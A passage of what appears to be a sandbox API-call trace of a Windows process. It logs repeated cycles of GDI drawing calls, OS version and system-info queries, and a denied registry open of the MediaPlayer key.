dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.686] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.686] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.686] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.686] BeginPath (hdc=0x0) returned 0 [0087.686] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.686] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.686] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.686] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.686] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.686] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.686] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.687] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x890401d0 [0087.687] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b0401cd [0087.687] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409cf [0087.687] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d0 [0087.687] CombineRgn (hrgnDst=0x10409cf, hrgnSrc1=0x890401d0, hrgnSrc2=0x8b0401cd, iMode=1) returned 1 [0087.687] CombineRgn (hrgnDst=0x10409d0, hrgnSrc1=0x890401d0, hrgnSrc2=0x8b0401cd, iMode=4) returned 2 [0087.687] CreateSolidBrush (color=0xff) returned 0x21009ce [0087.687] CreateSolidBrush (color=0xff0000) returned 0x11009d1 [0087.687] DeleteObject (ho=0x11009d1) returned 1 [0087.687] DeleteObject (ho=0x8b0401cd) returned 1 [0087.687] DeleteObject (ho=0x890401d0) returned 1 [0087.687] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.687] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.687] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.687] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.687] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.687] BeginPath (hdc=0x0) returned 0 [0087.687] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.687] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.687] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.687] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.687] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.687] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.687] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.687] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c0401cd [0087.687] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a0401d0 [0087.687] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d2 [0087.687] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d3 [0087.687] CombineRgn (hrgnDst=0x10409d2, hrgnSrc1=0x8c0401cd, hrgnSrc2=0x8a0401d0, iMode=1) returned 1 [0087.687] CombineRgn (hrgnDst=0x10409d3, hrgnSrc1=0x8c0401cd, hrgnSrc2=0x8a0401d0, iMode=4) returned 2 [0087.687] CreateSolidBrush (color=0xff) returned 0x21009d1 [0087.687] CreateSolidBrush (color=0xff0000) returned 0x11009d4 [0087.687] DeleteObject (ho=0x11009d4) returned 1 [0087.687] DeleteObject (ho=0x8a0401d0) returned 1 [0087.687] DeleteObject (ho=0x8c0401cd) returned 1 [0087.687] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.687] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.688] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.688] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.688] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.688] BeginPath (hdc=0x0) returned 0 [0087.688] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.688] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.688] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.688] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.688] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.688] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b0401d0 [0087.688] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d0401cd [0087.688] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d5 [0087.688] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d6 [0087.688] CombineRgn (hrgnDst=0x10409d5, hrgnSrc1=0x8b0401d0, hrgnSrc2=0x8d0401cd, iMode=1) returned 1 [0087.688] CombineRgn (hrgnDst=0x10409d6, hrgnSrc1=0x8b0401d0, hrgnSrc2=0x8d0401cd, iMode=4) returned 2 [0087.688] CreateSolidBrush (color=0xff) returned 0x21009d4 [0087.688] CreateSolidBrush (color=0xff0000) returned 0x11009d7 [0087.688] DeleteObject (ho=0x11009d7) returned 1 [0087.688] DeleteObject (ho=0x8d0401cd) returned 1 [0087.688] DeleteObject (ho=0x8b0401d0) returned 1 [0087.688] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.688] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.688] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.688] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.688] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.688] BeginPath (hdc=0x0) returned 0 [0087.688] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.688] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.688] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.688] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.688] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.689] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e0401cd [0087.689] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c0401d0 [0087.689] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d8 [0087.689] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d9 [0087.689] CombineRgn (hrgnDst=0x10409d8, hrgnSrc1=0x8e0401cd, hrgnSrc2=0x8c0401d0, iMode=1) returned 1 [0087.689] CombineRgn (hrgnDst=0x10409d9, hrgnSrc1=0x8e0401cd, hrgnSrc2=0x8c0401d0, iMode=4) returned 2 [0087.689] CreateSolidBrush (color=0xff) returned 0x21009d7 [0087.689] CreateSolidBrush (color=0xff0000) returned 0x11009da [0087.689] DeleteObject (ho=0x11009da) returned 1 [0087.689] DeleteObject (ho=0x8c0401d0) returned 1 [0087.689] DeleteObject (ho=0x8e0401cd) returned 1 [0087.689] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.689] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.689] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.689] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.689] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.689] BeginPath (hdc=0x0) returned 0 [0087.689] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.689] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.689] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.689] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.689] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.689] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.689] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.689] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d0401d0 [0087.689] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f0401cd [0087.689] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409db [0087.689] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409dc [0087.689] CombineRgn (hrgnDst=0x10409db, hrgnSrc1=0x8d0401d0, hrgnSrc2=0x8f0401cd, iMode=1) returned 1 [0087.689] CombineRgn (hrgnDst=0x10409dc, hrgnSrc1=0x8d0401d0, hrgnSrc2=0x8f0401cd, iMode=4) returned 2 [0087.689] CreateSolidBrush (color=0xff) returned 0x21009da [0087.689] CreateSolidBrush (color=0xff0000) returned 0x11009dd [0087.689] DeleteObject (ho=0x11009dd) returned 1 [0087.689] DeleteObject (ho=0x8f0401cd) returned 1 [0087.689] DeleteObject (ho=0x8d0401d0) returned 1 [0087.689] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.689] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.689] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.690] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.690] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.690] BeginPath (hdc=0x0) returned 0 [0087.690] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.690] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.690] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.690] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.690] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.690] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.690] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.690] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x900401cd [0087.690] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e0401d0 [0087.690] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409de [0087.690] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409df [0087.690] CombineRgn (hrgnDst=0x10409de, hrgnSrc1=0x900401cd, hrgnSrc2=0x8e0401d0, iMode=1) returned 1 [0087.690] CombineRgn (hrgnDst=0x10409df, hrgnSrc1=0x900401cd, hrgnSrc2=0x8e0401d0, iMode=4) returned 2 [0087.690] CreateSolidBrush (color=0xff) returned 0x21009dd [0087.690] CreateSolidBrush (color=0xff0000) returned 0x11009e0 [0087.690] DeleteObject (ho=0x11009e0) returned 1 [0087.690] DeleteObject (ho=0x8e0401d0) returned 1 [0087.690] DeleteObject (ho=0x900401cd) returned 1 [0087.690] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.690] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.690] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.690] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.690] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.690] BeginPath (hdc=0x0) returned 0 [0087.690] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.690] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.690] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.690] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.690] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.690] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.690] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.690] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f0401d0 [0087.690] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x910401cd [0087.690] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e1 [0087.691] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e2 [0087.691] CombineRgn (hrgnDst=0x10409e1, hrgnSrc1=0x8f0401d0, hrgnSrc2=0x910401cd, iMode=1) returned 1 [0087.691] CombineRgn (hrgnDst=0x10409e2, hrgnSrc1=0x8f0401d0, hrgnSrc2=0x910401cd, iMode=4) returned 2 [0087.691] CreateSolidBrush (color=0xff) returned 0x21009e0 [0087.691] CreateSolidBrush (color=0xff0000) returned 0x11009e3 [0087.691] DeleteObject (ho=0x11009e3) returned 1 [0087.691] DeleteObject (ho=0x910401cd) returned 1 [0087.691] DeleteObject (ho=0x8f0401d0) returned 1 [0087.691] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.691] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.691] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.691] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.691] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.691] BeginPath (hdc=0x0) returned 0 [0087.691] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.691] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.691] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.691] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.691] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.691] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.691] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.691] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x920401cd [0087.691] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x900401d0 [0087.691] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e4 [0087.691] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e5 [0087.691] CombineRgn (hrgnDst=0x10409e4, hrgnSrc1=0x920401cd, hrgnSrc2=0x900401d0, iMode=1) returned 1 [0087.691] CombineRgn (hrgnDst=0x10409e5, hrgnSrc1=0x920401cd, hrgnSrc2=0x900401d0, iMode=4) returned 2 [0087.691] CreateSolidBrush (color=0xff) returned 0x21009e3 [0087.691] CreateSolidBrush (color=0xff0000) returned 0x11009e6 [0087.691] DeleteObject (ho=0x11009e6) returned 1 [0087.691] DeleteObject (ho=0x900401d0) returned 1 [0087.691] DeleteObject (ho=0x920401cd) returned 1 [0087.691] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.691] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.691] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.691] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.691] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.691] BeginPath (hdc=0x0) returned 0 [0087.691] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.691] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.691] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.692] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.692] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.692] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.692] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.692] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x910401d0 [0087.692] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x930401cd [0087.692] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e7 [0087.692] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409e8 [0087.692] CombineRgn (hrgnDst=0x10409e7, hrgnSrc1=0x910401d0, hrgnSrc2=0x930401cd, iMode=1) returned 1 [0087.692] CombineRgn (hrgnDst=0x10409e8, hrgnSrc1=0x910401d0, hrgnSrc2=0x930401cd, iMode=4) returned 2 [0087.692] CreateSolidBrush (color=0xff) returned 0x21009e6 [0087.692] CreateSolidBrush (color=0xff0000) returned 0x11009e9 [0087.692] DeleteObject (ho=0x11009e9) returned 1 [0087.692] DeleteObject (ho=0x930401cd) returned 1 [0087.692] DeleteObject (ho=0x910401d0) returned 1 [0087.692] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.692] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.692] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.692] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.692] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.692] BeginPath (hdc=0x0) returned 0 [0087.692] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.692] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.692] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.692] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.692] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.692] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: 